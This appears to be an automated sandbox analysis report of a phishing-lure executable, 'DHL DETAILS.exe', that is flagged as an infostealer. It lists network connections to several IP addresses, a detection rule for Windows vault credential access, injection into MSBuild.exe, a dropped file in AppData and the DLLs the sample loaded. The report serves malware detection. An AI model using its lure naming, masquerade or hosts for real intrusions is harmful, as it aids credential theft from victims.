                Source: unknownNetwork traffic detected: HTTP traffic on port 56532 -> 443
                Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50075
                Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 56858
                Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 56610
                Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 53588
                Source: unknownNetwork traffic detected: HTTP traffic on port 54316 -> 443
                Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 65329
                Source: unknownNetwork traffic detected: HTTP traffic on port 51095 -> 443
                Source: unknownNetwork traffic detected: HTTP traffic on port 51107 -> 443
                Source: unknownNetwork traffic detected: HTTP traffic on port 57501 -> 443
                Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 58807
                Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 63162
                Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 65100
                Source: unknownNetwork traffic detected: HTTP traffic on port 50572 -> 443
                Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 58809
                Source: unknownNetwork traffic detected: HTTP traffic on port 62405 -> 443
                Source: unknownNetwork traffic detected: HTTP traffic on port 50937 -> 443
                Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 58808
                Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 56624
                Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 58802
                Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 55778
                Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 53595
                Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 56627
                Source: unknownNetwork traffic detected: HTTP traffic on port 61195 -> 443
                Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 56620
                Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 56863
                Source: unknownNetwork traffic detected: HTTP traffic on port 63011 -> 443
                Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 55781
                Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 65334
                Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 64002
                Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 65335
                Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 64004
                Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 65333
                Source: unknownNetwork traffic detected: HTTP traffic on port 49366 -> 443
                Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 64008
                Source: unknownNetwork traffic detected: HTTP traffic on port 56874 -> 443
                Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 51107
                Source: unknownNetwork traffic detected: HTTP traffic on port 59647 -> 443
                Source: unknownNetwork traffic detected: HTTP traffic on port 54670 -> 443
                Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50494
                Source: unknownNetwork traffic detected: HTTP traffic on port 62477 -> 443
                Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50493
                Source: unknownNetwork traffic detected: HTTP traffic on port 51942 -> 443
                Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 62239
                Source: unknownNetwork traffic detected: HTTP traffic on port 60536 -> 443
                Source: unknownNetwork traffic detected: HTTP traffic on port 53152 -> 443
                Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 62473
                Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 62474
                Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 62476
                Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 62477
                Source: unknownNetwork traffic detected: HTTP traffic on port 53588 -> 443
                Source: unknownNetwork traffic detected: HTTP traffic on port 56338 -> 443
                Source: unknownNetwork traffic detected: HTTP traffic on port 55746 -> 443
                Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 62251
                Source: unknownNetwork traffic detected: HTTP traffic on port 50952 -> 443
                Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50022
                Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 53536
                Source: unknownNetwork traffic detected: HTTP traffic on port 55781 -> 443
                Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 63576
                Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 62248
                Source: unknownNetwork traffic detected: HTTP traffic on port 50468 -> 443
                Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 56819
                Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 55969
                Source: unknownNetwork traffic detected: HTTP traffic on port 50596 -> 443
                Source: unknownNetwork traffic detected: HTTP traffic on port 60246 -> 443
                Source: unknownNetwork traffic detected: HTTP traffic on port 65155 -> 443
                Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50033
                Source: unknownNetwork traffic detected: HTTP traffic on port 62867 -> 443
                Source: unknownNetwork traffic detected: HTTP traffic on port 57262 -> 443
                Source: unknownNetwork traffic detected: HTTP traffic on port 63057 -> 443
                Source: unknownNetwork traffic detected: HTTP traffic on port 50412 -> 443
                Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 62494
                Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 62253
                Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 64430
                Source: unknownNetwork traffic detected: HTTP traffic on port 63173 -> 443
                Source: unknownNetwork traffic detected: HTTP traffic on port 61185 -> 443
                Source: unknownNetwork traffic detected: HTTP traffic on port 61460 -> 443
                Source: unknownNetwork traffic detected: HTTP traffic on port 64453 -> 443
                Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 56827
                Source: unknownNetwork traffic detected: HTTP traffic on port 50033 -> 443
                Source: unknownNetwork traffic detected: HTTP traffic on port 51380 -> 443
                Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 64451
                Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 51376
                Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 56824
                Source: unknownNetwork traffic detected: HTTP traffic on port 59249 -> 443
                Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 56825
                Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 51377
                Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 51378
                Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 51380
                Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 61177
                Source: unknownNetwork traffic detected: HTTP traffic on port 51270 -> 443
                Source: unknownNetwork traffic detected: HTTP traffic on port 51907 -> 443
                Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 64448
                Source: unknownNetwork traffic detected: HTTP traffic on port 64070 -> 443
                Source: unknownNetwork traffic detected: HTTP traffic on port 50122 -> 443
                Source: unknownNetwork traffic detected: HTTP traffic on port 56878 -> 443
                Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 65155
                Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 54497
                Source: unknownNetwork traffic detected: HTTP traffic on port 50357 -> 443
                Source: unknownNetwork traffic detected: HTTP traffic on port 50598 -> 443
                Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 57524
                Source: unknownNetwork traffic detected: HTTP traffic on port 57178 -> 443
                Source: unknownNetwork traffic detected: HTTP traffic on port 55083 -> 443
                Source: unknownNetwork traffic detected: HTTP traffic on port 60796 -> 443
                Source: unknownNetwork traffic detected: HTTP traffic on port 50844 -> 443
                Source: unknownNetwork traffic detected: HTTP traffic on port 54491 -> 443
                Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 64070
                Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 65160
                Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 56206
                Source: unknownNetwork traffic detected: HTTP traffic on port 53962 -> 443
                Source: unknownNetwork traffic detected: HTTP traffic on port 50053 -> 443
                Source: unknownNetwork traffic detected: HTTP traffic on port 51207 -> 443
                Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50909
                Source: unknownNetwork traffic detected: HTTP traffic on port 55810 -> 443
                Source: unknownNetwork traffic detected: HTTP traffic on port 59215 -> 443
                Source: unknownNetwork traffic detected: HTTP traffic on port 58807 -> 443
                Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 64082
                Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50912
                Source: unknownNetwork traffic detected: HTTP traffic on port 60040 -> 443
                Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 56219
                Source: unknownNetwork traffic detected: HTTP traffic on port 49202 -> 443
                Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 56214
                Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 56216
                Source: unknownNetwork traffic detected: HTTP traffic on port 60538 -> 443
                Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50919
                Source: unknownNetwork traffic detected: HTTP traffic on port 63936 -> 443
                Source: unknownNetwork traffic detected: HTTP traffic on port 56982 -> 443
                Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 64093
                Source: unknownNetwork traffic detected: HTTP traffic on port 54726 -> 443
                Source: unknownNetwork traffic detected: HTTP traffic on port 54669 -> 443
                Source: unknownNetwork traffic detected: HTTP traffic on port 55100 -> 443
                Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 64097
                Source: unknownNetwork traffic detected: HTTP traffic on port 51716 -> 443
                Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50926
                Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 56228
                Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 62906
                Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 56229
                Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 62907
                Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 62908
                Source: unknownNetwork traffic detected: HTTP traffic on port 59633 -> 443
                Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 56226
                Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 56227
                Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 62901
                Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 62903
                Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 62904
                Source: unknownNetwork traffic detected: HTTP traffic on port 50866 -> 443
                Source: unknownNetwork traffic detected: HTTP traffic on port 54154 -> 443
                Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 63171
                Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 63170
                Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 63173
                Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 65352
                Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 63172
                Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 65111
                Source: unknownNetwork traffic detected: HTTP traffic on port 53751 -> 443
                Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 63174
                Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 56877
                Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 56878
                Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 53129
                Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 58810
                Source: unknownNetwork traffic detected: HTTP traffic on port 56341 -> 443
                Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 56874
                Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 56876
                Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 55787
                Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 51192
                Source: unknownNetwork traffic detected: HTTP traffic on port 50075 -> 443
                Source: unknownNetwork traffic detected: HTTP traffic on port 51097 -> 443
                Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 65102
                Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 63169
                Source: unknownNetwork traffic detected: HTTP traffic on port 63934 -> 443
                Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 65347
                Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 65348
                Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 65106
                Source: unknownNetwork traffic detected: HTTP traffic on port 62413 -> 443
                Source: unknownNetwork traffic detected: HTTP traffic on port 57188 -> 443
                Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 56889
                Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 51197
                Source: unknownNetwork traffic detected: HTTP traffic on port 56028 -> 443
                Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 55795
                Source: unknownNetwork traffic detected: HTTP traffic on port 56716 -> 443
                Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 53137
                Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 56887
                Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 56891
                Source: unknownNetwork traffic detected: HTTP traffic on port 59687 -> 443
                Source: unknownNetwork traffic detected: HTTP traffic on port 52122 -> 443
                Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 56890
                Source: unknownNetwork traffic detected: HTTP traffic on port 55969 -> 443
                Source: unknownNetwork traffic detected: HTTP traffic on port 50939 -> 443
                Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 63176
                Source: unknownNetwork traffic detected: HTTP traffic on port 62248 -> 443
                Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 65355
                Source: unknownNetwork traffic detected: HTTP traffic on port 59771 -> 443
                Source: unknownNetwork traffic detected: HTTP traffic on port 55795 -> 443
                Source: unknownNetwork traffic detected: HTTP traffic on port 56819 -> 443
                Source: unknownNetwork traffic detected: HTTP traffic on port 50493 -> 443
                Source: unknownNetwork traffic detected: HTTP traffic on port 56876 -> 443
                Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 53147
                Source: unknownNetwork traffic detected: HTTP traffic on port 50856 -> 443
                Source: unknownNetwork traffic detected: HTTP traffic on port 51377 -> 443
                Source: unknownNetwork traffic detected: HTTP traffic on port 54832 -> 443
                Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 57501
                Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 53149
                Source: unknownNetwork traffic detected: HTTP traffic on port 50949 -> 443
                Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 53152
                Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 53151
                Source: unknownNetwork traffic detected: HTTP traffic on port 60794 -> 443
                Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 65127
                Source: unknownNetwork traffic detected: HTTP traffic on port 64082 -> 443
                Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 54005
                Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 53157
                Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 54003
                Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 53159
                Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 54006
                Source: unknownNetwork traffic detected: HTTP traffic on port 53960 -> 443
                Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 54491
                Source: unknownNetwork traffic detected: HTTP traffic on port 59385 -> 443
                Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 55100
                Source: unknownNetwork traffic detected: HTTP traffic on port 61177 -> 443
                Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 55101
                Source: unknownNetwork traffic detected: HTTP traffic on port 51706 -> 443
                Source: unknownNetwork traffic detected: HTTP traffic on port 50950 -> 443
                Source: unknownNetwork traffic detected: HTTP traffic on port 62831 -> 443
                Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 54494
                Source: unknownNetwork traffic detected: HTTP traffic on port 56132 -> 443
                Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 54493
                Source: unknownNetwork traffic detected: HTTP traffic on port 59643 -> 443
                Source: unknownNetwork traffic detected: HTTP traffic on port 63281 -> 443
                Source: unknownNetwork traffic detected: HTTP traffic on port 50909 -> 443
                Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50856
                Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 51942
                Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50858
                Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 51706
                Source: unknownNetwork traffic detected: HTTP traffic on port 62813 -> 443
                Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50859
                Source: unknownNetwork traffic detected: HTTP traffic on port 49359 -> 443
                Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 56165
                Source: unknownNetwork traffic detected: HTTP traffic on port 56216 -> 443
                Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 57494
                Source: unknownNetwork traffic detected: HTTP traffic on port 61969 -> 443
                Source: unknownNetwork traffic detected: HTTP traffic on port 56858 -> 443
                Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 62831
                Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50865
                Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 51714
                Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50866
                Source: unknownNetwork traffic detected: HTTP traffic on port 50314 -> 443
                Source: unknownNetwork traffic detected: HTTP traffic on port 65335 -> 443
                Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 51716
                Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 55086
                Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 59687
                Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 55083
                Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 63934
                Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 63937
                Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 55089
                Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 63936
                Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 57262
                Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 63939
                Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 59683
                Source: unknownNetwork traffic detected: HTTP traffic on port 55086 -> 443
                Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 59680
                Source: unknownNetwork traffic detected: HTTP traffic on port 63027 -> 443
                Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 55082
                Source: unknownNetwork traffic detected: HTTP traffic on port 59219 -> 443
                Source: unknownNetwork traffic detected: HTTP traffic on port 53157 -> 443
                Source: unknownHTTPS traffic detected: 140.82.114.3:443 -> 192.168.2.5:49706 version: TLS 1.2
                Source: unknownHTTPS traffic detected: 172.67.140.87:443 -> 192.168.2.5:51523 version: TLS 1.2
                Source: unknownHTTPS traffic detected: 172.67.140.87:443 -> 192.168.2.5:51524 version: TLS 1.2
                Source: unknownHTTPS traffic detected: 222.255.238.159:443 -> 192.168.2.5:53536 version: TLS 1.2
                Source: unknownHTTPS traffic detected: 102.223.20.217:443 -> 192.168.2.5:53639 version: TLS 1.2
                Source: unknownHTTPS traffic detected: 140.82.114.3:443 -> 192.168.2.5:55292 version: TLS 1.2
                Source: unknownHTTPS traffic detected: 140.82.114.3:443 -> 192.168.2.5:55293 version: TLS 1.2
                Source: unknownHTTPS traffic detected: 172.67.140.87:443 -> 192.168.2.5:57177 version: TLS 1.2
                Source: unknownHTTPS traffic detected: 172.67.140.87:443 -> 192.168.2.5:57178 version: TLS 1.2
                Source: unknownHTTPS traffic detected: 222.255.238.159:443 -> 192.168.2.5:59163 version: TLS 1.2
                Source: unknownHTTPS traffic detected: 102.223.20.217:443 -> 192.168.2.5:59424 version: TLS 1.2
                Source: unknownHTTPS traffic detected: 140.82.113.3:443 -> 192.168.2.5:60799 version: TLS 1.2
                Source: unknownHTTPS traffic detected: 172.67.140.87:443 -> 192.168.2.5:63279 version: TLS 1.2
                Source: unknownHTTPS traffic detected: 140.82.113.3:443 -> 192.168.2.5:63403 version: TLS 1.2
                Source: unknownHTTPS traffic detected: 222.255.238.159:443 -> 192.168.2.5:49207 version: TLS 1.2
                Source: unknownHTTPS traffic detected: 102.223.20.217:443 -> 192.168.2.5:49301 version: TLS 1.2
                Source: unknownHTTPS traffic detected: 172.67.140.87:443 -> 192.168.2.5:56165 version: TLS 1.2
                Source: unknownHTTPS traffic detected: 222.255.238.159:443 -> 192.168.2.5:62819 version: TLS 1.2
                Source: unknownHTTPS traffic detected: 102.223.20.217:443 -> 192.168.2.5:63576 version: TLS 1.2

                System Summary

                barindex
                Source: 16.2.MSBuild.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: Detects executables referencing Windows vault credential objects. Observed in infostealers Author: ditekSHen
                Source: C:\Windows\System32\svchost.exeFile created: C:\Windows\ServiceProfiles\LocalService\AppData\Local\FontCache\Fonts\Download-1.tmpJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 16_2_0158D22016_2_0158D220
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 16_2_0158ABA116_2_0158ABA1
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 16_2_01584A9816_2_01584A98
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 16_2_01589ED816_2_01589ED8
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 16_2_01583E8016_2_01583E80
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 16_2_015841C816_2_015841C8
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 16_2_0675A06816_2_0675A068
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 16_2_0675BB5716_2_0675BB57
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 16_2_0675BB5816_2_0675BB58
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 16_2_06785AD816_2_06785AD8
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 16_2_067842C016_2_067842C0
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 16_2_0678914716_2_06789147
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 16_2_0678E11816_2_0678E118
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 16_2_06780F0516_2_06780F05
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 16_2_06784D6016_2_06784D60
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 16_2_067853E016_2_067853E0
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 16_2_0678C3B816_2_0678C3B8
                Source: C:\Users\user\AppData\Roaming\VHFSQv\VHFSQv.exeCode function: 24_2_01731CC024_2_01731CC0
                Source: C:\Users\user\AppData\Roaming\VHFSQv\VHFSQv.exeCode function: 24_2_0173278824_2_01732788
                Source: C:\Users\user\AppData\Roaming\VHFSQv\VHFSQv.exeCode function: 24_2_01735A4124_2_01735A41
                Source: C:\Users\user\AppData\Roaming\VHFSQv\VHFSQv.exeCode function: 32_2_015E1CC032_2_015E1CC0
                Source: C:\Users\user\AppData\Roaming\VHFSQv\VHFSQv.exeCode function: 32_2_015E278832_2_015E2788
                Source: C:\Users\user\AppData\Roaming\VHFSQv\VHFSQv.exeCode function: 32_2_015E5A4132_2_015E5A41
                Source: C:\Windows\System32\svchost.exeProcess created: C:\Windows\System32\WerFault.exe C:\Windows\system32\WerFault.exe -pss -s 436 -p 43312 -ip 43312
                Source: DHL DETAILS.exeStatic PE information: No import functions for PE file found
                Source: svchost.exe.0.drStatic PE information: No import functions for PE file found
                Source: DHL DETAILS.exe, 00000000.00000000.2093570992.0000028F61F62000.00000002.00000001.01000000.00000003.sdmpBinary or memory string: OriginalFilenameAssalamAlaikum.exe> vs DHL DETAILS.exe
                Source: DHL DETAILS.exeBinary or memory string: OriginalFilenameAssalamAlaikum.exe> vs DHL DETAILS.exe
                Source: C:\Users\user\Desktop\DHL DETAILS.exeSection loaded: mscoree.dllJump to behavior
                Source: C:\Users\user\Desktop\DHL DETAILS.exeSection loaded: apphelp.dllJump to behavior
                Source: C:\Users\user\Desktop\DHL DETAILS.exeSection loaded: kernel.appcore.dllJump to behavior
                Source: C:\Users\user\Desktop\DHL DETAILS.exeSection loaded: version.dllJump to behavior
                Source: C:\Users\user\Desktop\DHL DETAILS.exeSection loaded: vcruntime140_clr0400.dllJump to behavior
                Source: C:\Users\user\Desktop\DHL DETAILS.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
                Source: C:\Users\user\Desktop\DHL DETAILS.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
                Source: C:\Users\user\Desktop\DHL DETAILS.exeSection loaded: uxtheme.dllJump to behavior
                Source: C:\Users\user\Desktop\DHL DETAILS.exeSection loaded: windows.storage.dllJump to behavior
                Source: C:\Users\user\Desktop\DHL DETAILS.exeSection loaded: wldp.dllJump to behavior
                Source: C:\Users\user\Desktop\DHL DETAILS.exeSection loaded: profapi.dllJump to behavior
                Source: C:\Users\user\Desktop\DHL DETAILS.exeSection loaded: cryptsp.dllJump to behavior
                Source: C:\Users\user\Desktop\DHL DETAILS.exeSection loaded: rsaenh.dllJump to behavior
                Source: C:\Users\user\Desktop\DHL DETAILS.exeSection loaded: cryptbase.dllJump to behavior
                Source: C:\Users\user\Desktop\DHL DETAILS.exeSection loaded: dwrite.dllJump to behavior
                Source: C:\Users\user\Desktop\DHL DETAILS.exeSection loaded: textshaping.dllJump to behavior
                Source: C:\Users\user\Desktop\DHL DETAILS.exeSection loaded: riched20.dllJump to behavior
                Source: C:\Users\user\Desktop\DHL DETAILS.exeSection loaded: usp10.dllJump to behavior
                Source: C:\Users\user\Desktop\DHL DETAILS.exeSection loaded: msls31.dllJump to behavior
                Source: C:\Users\user\Desktop\DHL DETAILS.exeSection loaded: amsi.dllJump to behavior
                Source: C:\Users\user\Desktop\DHL DETAILS.exeSection loaded: userenv.dllJump to behavior
                Source: C:\Users\user\Desktop\DHL DETAILS.exeSection loaded: rasapi32.dllJump to behavior
                Source: C:\Users\user\Desktop\DHL DETAILS.exeSection loaded: rasman.dllJump to behavior
                Source: C:\Users\user\Desktop\DHL DETAILS.exeSection loaded: rtutils.dllJump to behavior
                Source: C:\Users\user\Desktop\DHL DETAILS.exeSection loaded: mswsock.dllJump to behavior
                Source: C:\Users\user\Desktop\DHL DETAILS.exeSection loaded: winhttp.dllJump to behavior
                Source: C:\Users\user\Desktop\DHL DETAILS.exeSection loaded: ondemandconnroutehelper.dllJump to behavior
                Source: C:\Users\user\Desktop\DHL DETAILS.exeSection loaded: iphlpapi.dllJump to behavior
                Source: C:\Users\user\Desktop\DHL DETAILS.exeSection loaded: dhcpcsvc6.dllJump to behavior
                Source: C:\Users\user\Desktop\DHL DETAILS.exeSection loaded: dhcpcsvc.dllJump to behavior
                Source: C:\Users\user\Desktop\DHL DETAILS.exeSection loaded: dnsapi.dllJump to behavior
                Source: C:\Users\user\Desktop\DHL DETAILS.exeSection loaded: winnsi.dllJump to behavior
                Source: C:\Users\user\Desktop\DHL DETAILS.exeSection loaded: rasadhlp.dllJump to behavior
                Source: C:\Users\user\Desktop\DHL DETAILS.exeSection loaded: fwpuclnt.dllJump to behavior
                Source: C:\Users\user\Desktop\DHL DETAILS.exeSection loaded: secur32.dllJump to behavior
                Source: C:\Users\user\Desktop\DHL DETAILS.exeSection loaded: sspicli.dllJump to behavior
                Source: C:\Users\user\Desktop\DHL DETAILS.exeSection loaded: schannel.dllJump to behavior
                Source: C:\Users\user\Desktop\DHL DETAILS.exeSection loaded: mskeyprotect.dllJump to behavior
                Source: C:\Users\user\Desktop\DHL DETAILS.exeSection loaded: ntasn1.dllJump to behavior
                Source: C:\Users\user\Desktop\DHL DETAILS.exeSection loaded: ncrypt.dllJump to behavior
                Source: C:\Users\user\Desktop\DHL DETAILS.exeSection loaded: ncryptsslp.dllJump to behavior
                Source: C:\Users\user\Desktop\DHL DETAILS.exeSection loaded: msasn1.dllJump to behavior
                Source: C:\Users\user\Desktop\DHL DETAILS.exeSection loaded: gpapi.dllJump to behavior
                Source: C:\Users\user\Desktop\DHL DETAILS.exeSection loaded: webio.dllJump to behavior
                Source: C:\Users\user\Desktop\DHL DETAILS.exeSection loaded: logoncli.dllJump to behavior
                Source: C:\Users\user\Desktop\DHL DETAILS.exeSection loaded: netutils.dllJump to behavior
                Source: C:\Users\user\Desktop\DHL DETAILS.exeSection loaded: propsys.dllJump to behavior
                Source: C:\Users\user\Desktop\DHL DETAILS.exeSection loaded: edputil.dllJump to behavior
                Source: C:\Users\user\Desktop\DHL DETAILS.exeSection loaded: urlmon.dllJump to behavior
                Source: C:\Users\user\Desktop\DHL DETAILS.exeSection loaded: iertutil.dllJump to behavior
                Source: C:\Users\user\Desktop\DHL DETAILS.exeSection loaded: srvcli.dllJump to behavior
                Source: C:\Users\user\Desktop\DHL DETAILS.exeSection loaded: windows.staterepositoryps.dllJump to behavior
                Source: C:\Users\user\Desktop\DHL DETAILS.exeSection loaded: wintypes.dllJump to behavior
                Source: C:\Users\user\Desktop\DHL DETAILS.exeSection loaded: appresolver.dllJump to behavior
                Source: C:\Users\user\Desktop\DHL DETAILS.exeSection loaded: bcp47langs.dllJump to behavior
                Source: C:\Users\user\Desktop\DHL DETAILS.exeSection loaded: slc.dllJump to behavior
                Source: C:\Users\user\Desktop\DHL DETAILS.exeSection loaded: sppc.dllJump to behavior
                Source: C:\Users\user\Desktop\DHL DETAILS.exeSection loaded: onecorecommonproxystub.dllJump to behavior
                Source: C:\Users\user\Desktop\DHL DETAILS.exeSection loaded: onecoreuapcommonproxystub.dllJump to behavior
